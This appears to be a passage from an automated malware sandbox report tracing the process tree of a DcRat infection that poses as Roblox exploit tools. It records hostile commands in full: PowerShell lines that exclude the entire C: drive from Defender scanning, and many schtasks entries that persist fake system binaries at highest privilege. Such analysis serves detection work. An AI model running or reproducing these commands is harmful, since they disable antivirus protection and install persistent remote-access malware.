      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pw2infla\pw2infla.cmdline"
        6⤵
        
        PID:4808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES488D.tmp" "c:\winNet\CSC4C5E612632B74DCFAA146338F7C6DFEF.TMP"
        7⤵
        
        PID:5840
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5pvzrpo\e5pvzrpo.cmdline"
        6⤵
        
        PID:4952
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C17.tmp" "c:\Program Files\Windows NT\Accessories\en-US\CSC317492395941434B99D257C756B9AB69.TMP"
        7⤵
        
        PID:104
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhylqmpt\mhylqmpt.cmdline"
        6⤵
        
        PID:5280
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5270.tmp" "c:\Program Files (x86)\Internet Explorer\SIGNUP\CSC966A093FB64E446AB5D559826060E065.TMP"
        7⤵
        
        PID:5908
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jjqyoqpn\jjqyoqpn.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:5516
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5678.tmp" "c:\Windows\System32\CSC9083A010E69947F896FE603A096176C.TMP"
        7⤵
        
        PID:5912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:128
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3288
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5712
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1096
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4752
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:420
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4880
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4608
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2TSoQ2E8cZ.bat"
        6⤵
        
        PID:4892
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1628
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:5780
        
        C:\DriversavessessionDlldhcp\Roblox.exe
        
        "C:\DriversavessessionDlldhcp\Roblox.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\security\database\conhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\security\database\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\security\database\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Users\Default\My Documents\sysmon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\My Documents\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\Default\My Documents\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\winNet\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\winNet\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2448

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:6096
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 76042A562D6F12C143857389B162EC25
  2⤵
  - Loads dropped DLL
  PID:5168
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D42F7B75CD86A02C97458B990756F1B8
  2⤵
  - Loads dropped DLL
  PID:5340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7EC7E07C133CC61C77105681E9539DDE E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:2180
- - C:\Windows\SysWOW64\wevtutil.exe
    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
    3⤵
    PID:1992
  - - C:\Windows\System32\wevtutil.exe
      "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
      4⤵
      PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1204

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5128

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4056

C:\DriversavessessionDlldhcp\lsass.exe
C:\DriversavessessionDlldhcp\lsass.exe
1⤵
- Executes dropped EXE
PID:3876
- C:\DriversavessessionDlldhcp\lsass.exe.exe
  "C:\DriversavessessionDlldhcp\lsass.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:12048
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:1508

C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
"C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12520
- C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.7.0.exe
  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.7.0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:8100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/wiki/Release-notes-for-Bloxstrap-v2.7.0
    3⤵
    PID:8804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
      4⤵
      PID:8900
- - C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
    "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" --app -channel production
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of UnmapMainImage
    PID:14216

C:\winNet\Registry.exe
C:\winNet\Registry.exe
1⤵
- Executes dropped EXE
PID:10368
- C:\winNet\Registry.exe.exe
  "C:\winNet\Registry.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:15912
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:15904

C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe
"C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe"
1⤵
- Executes dropped EXE
PID:10640
- C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe.exe
  "C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:15920
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:15928

C:\Windows\Migration\SolaraBootstrapper.exe
C:\Windows\Migration\SolaraBootstrapper.exe
1⤵
- Executes dropped EXE
PID:10104
- C:\Windows\Migration\SolaraBootstrapper.exe.exe
  "C:\Windows\Migration\SolaraBootstrapper.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:15888
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:15896

C:\Users\Admin\AppData\Local\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\RuntimeBroker.exe
1⤵
- Executes dropped EXE
PID:14944

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe
"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe"
1⤵
- Executes dropped EXE
PID:14916
- C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe.exe
  "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:14840
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:14832

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:15692

C:\Program Files\Windows NT\Accessories\en-US\sihost.exe
"C:\Program Files\Windows NT\Accessories\en-US\sihost.exe"
1⤵
- Executes dropped EXE
PID:16188
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:16116
- C:\Program Files\Windows NT\Accessories\en-US\sihost.exe.exe
  "C:\Program Files\Windows NT\Accessories\en-US\sihost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:16108

C:\DriversavessessionDlldhcp\Roblox.exe
C:\DriversavessessionDlldhcp\Roblox.exe
1⤵
- Executes dropped EXE
PID:14268

C:\Windows\security\database\conhost.exe
C:\Windows\security\database\conhost.exe
1⤵
- Executes dropped EXE
PID:9172
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Windows\security\database\conhost.exe.exe
  "C:\Windows\security\database\conhost.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3316

C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe
"C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe"
1⤵
- Executes dropped EXE
PID:5528
- C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe.exe
  "C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2488
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:10012

C:\winNet\csrss.exe
C:\winNet\csrss.exe
1⤵
- Executes dropped EXE
PID:4232
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:9596
- C:\winNet\csrss.exe.exe
  "C:\winNet\csrss.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:6248

C:\DriversavessessionDlldhcp\lsass.exe
C:\DriversavessessionDlldhcp\lsass.exe
1⤵
- Executes dropped EXE
PID:9644
- C:\DriversavessessionDlldhcp\lsass.exe.exe
